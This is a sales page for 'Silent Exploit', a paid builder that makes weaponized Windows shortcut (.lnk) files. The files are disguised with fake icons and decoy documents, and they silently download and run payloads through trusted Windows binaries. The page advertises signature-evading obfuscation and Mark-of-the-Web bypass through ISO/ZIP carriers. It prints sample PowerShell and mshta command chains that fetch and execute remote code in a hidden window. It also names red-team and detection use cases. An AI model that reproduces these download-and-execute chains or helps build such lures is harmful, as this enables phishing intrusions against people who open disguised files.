Terminal LogoSilent Exploit
Exploit Builder BuilderBuilder Module
Exploit Builder/ Builders/ LNK
LNK
Windows Shortcut · LOLBin Abuse

LNK Builder.

.lnk

Constructs weaponized Windows Shortcut files that act as silent execution vectors. Instead of pointing at a direct executable, the shortcut creatively parses built-in Windows commands (LOLBins) to download, decrypt, and launch your payload entirely in the background — while presenting any icon and any name you choose.

Single click
Activation
Win 7+
Compatibility
Custom icon
Visual Spoof
No PE
Static Surface
Overview

What is a weaponized LNK?

A Windows Shortcut (.lnk) is a structured binary file that tells explorer.exe what to launch when double-clicked. The format has dozens of fields — target path, command-line arguments, working directory, icon location, hotkey, and more — and Windows accepts very long, very flexible argument strings.

Exploit Builder abuses this flexibility. The generated .lnk targets a fully-trusted Windows binary (a LOLBin) such as powershell.exe, cmd.exe, mshta.exe, rundll32.exe, or conhost.exe, and passes a multi-stage argument chain that ultimately fetches and runs your payload. The shortcut itself contains no PE, no embedded executable — it's just text in a structured file.

  • Single double-click › silent execution, no UAC, no SmartScreen if delivered correctly
  • Custom icon (PNG/ICO) — pose as a PDF, DOCX, image, or folder
  • Argument string up to ~4 KB — plenty of room for staged decoders
  • Optional decoy file opened alongside execution
Execution Flow

How the builder works.

STEP 01

Provide Payload

URL or local embed. Either point to an HTTPS-hosted payload that the LOLBin chain fetches at click-time, or embed a small first-stage blob (script / shellcode) directly into the LNK argument string for fully-offline execution.

STEP 02

Pick LOLBin

Choose execution host: powershell.exe, mshta.exe, rundll32, cmd.exe + curl, or a chained variant.

STEP 03

Customize Display

Pick an icon, set the visible name, optional decoy file, hidden window flag, and working-directory spoof.

STEP 04

Build & Deliver

Output is a single .lnk. Pack inside an .iso, .zip, or .img for MotW-friendly delivery.

Technical Details

Under the hood.

Shell Link Binary Format

Exploit Builder writes a fully-spec-compliant SHELL_LINK structure (HeaderBlock, LinkTargetIDList, LinkInfo, StringData, ExtraData). Targets parse correctly across Windows 7 through 11 24H2.

LOLBin Targets

Pre-baked execution chains for: powershell.exe, pwsh.exe, cmd.exe, mshta.exe, rundll32.exe, regsvr32.exe, installutil, msbuild, and conhost.

Argument Obfuscation

Base64, hex, ROT, character-substitution, and FromBase64String+IEX chains. Variable-name randomization and whitespace padding to defeat static signatures.

Icon Spoofing

Embed any .ico or auto-extract icons from system DLLs (imageres.dll, shell32.dll) so the LNK looks like a folder, PDF, document, or image.

Decoy Document

Optional: drop & open a benign PDF/DOCX from the same archive so the user sees expected content while execution happens silently.

Hidden Window

Sets SW_HIDE so the LOLBin window never flashes. Combined with conhost --headless or PowerShell -WindowStyle Hidden for full silence.

lnk-arguments · simplified PowerShell variant 
# Target: %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe
# Arguments (obfuscated, hidden window):
-W 1 -nop -ep bypass -c "$u='https://...';" + `
   "iex(New-Object Net.WebClient).DownloadString($u)"

# Or via mshta (no PowerShell ETW):
mshta.exe javascript:a=new ActiveXObject("WScript.Shell");
         a.Run("powershell -nop -w 1 -c iex(...)",0);close();
Specifications

Module specs.

Output FormatWindows Shell Link (.lnk) per MS-SHLLINK spec
Delivery ModeURL stager (LOLBin fetches at click) · Local embed (first-stage blob inside argument string)
OS CompatibilityWindows 7 / 8.1 / 10 / 11 (all builds incl. 24H2)
LOLBin Targetspowershell, pwsh, cmd, mshta, rundll32, regsvr32, installutil, msbuild
Argument ObfuscationBase64 · Hex · ROT · char-substitution · variable randomization
Icon SourcesCustom .ico · embedded PNG · auto-extract from system DLLs
Window StyleNormal · Minimized · Hidden (SW_HIDE)
Decoy SupportDrop & open PDF / DOCX / image alongside execution
Recommended Carrier.iso / .img / password-protected .zip (MotW-stripping)
Max Argument Length~4096 chars (Windows MAX_PATH × ~16 with override)
Use Cases

When to use LNK.

🎣

Phishing Lure

Authorized phishing simulations where the lure is a "document" — LNK with PDF icon inside an ISO is a classic vector worth testing against.

📡

Initial Access

Red team engagements needing a small, non-PE artifact that survives email gateways and executes via trusted LOLBins.

🔬

Detection Engineering

Generate samples to validate Sigma rules for suspicious LNK arguments, LOLBin parent-child chains, and Mark-of-the-Web bypasses.

🧪

Sandbox Testing

Tune EDR detonation environments by feeding them LNKs with varied LOLBin targets and obfuscation styles.

🎓

Awareness Training

Show users why a "PDF.lnk" inside a downloaded ZIP is dangerous — measurable click-through metrics.

🌐

APT Replay

Reproduce TTPs from APT29, Bumblebee, Emotet 2022+ resurgence, and other LNK-heavy campaigns for purple-team work.

Pricing

LNK Builder plans.

All tiers include unlimited builds, every LOLBin target, full obfuscation, and updates within the term.

1 Month
3 Months
6 Months
12 Months
Lifetime

Bundle option. Need multiple builders? The All Modules Bundle covers every builder + both launchers at a steep discount.

Other Modules

Explore the full suite.

XLL Builder
.xll
Script Builder
.vbs · .js · .bat
Macro Builder
.docm · .xlsm
MSC Builder
.msc
CPL Builder
.cpl
CHM Builder
.chm
EXE Launcher
PE Loader
JAR Launcher
JRE-less

Ready to ship?

Pick a tier above or talk to us — we'll match the right configuration to your engagement.

Email · quimadev@proton.me Telegram · @QuimaDEV